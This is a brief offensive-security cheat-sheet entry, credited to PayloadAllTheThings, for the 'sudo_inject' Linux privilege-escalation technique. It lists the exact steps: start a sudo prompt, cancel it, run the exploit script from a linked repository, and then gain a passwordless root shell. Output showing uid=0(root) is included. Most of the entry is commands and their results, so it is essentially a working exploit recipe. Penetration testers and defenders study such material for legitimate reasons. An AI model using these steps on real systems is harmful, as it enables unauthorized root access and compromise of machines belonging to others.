sudo_inject

Technique from PayloadAllTheThings

Using https://github.com/nongiach/sudo_inject $ sudo whatever [sudo] password for user: # Press <ctrl>+c since you don't have the password. # This creates an invalid sudo tokens. $ sh exploit.sh .... wait 1 seconds $ sudo -i # no password required :) # id uid=0(root) gid=0(root) groups=0(root)

Slides of the presentation : https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf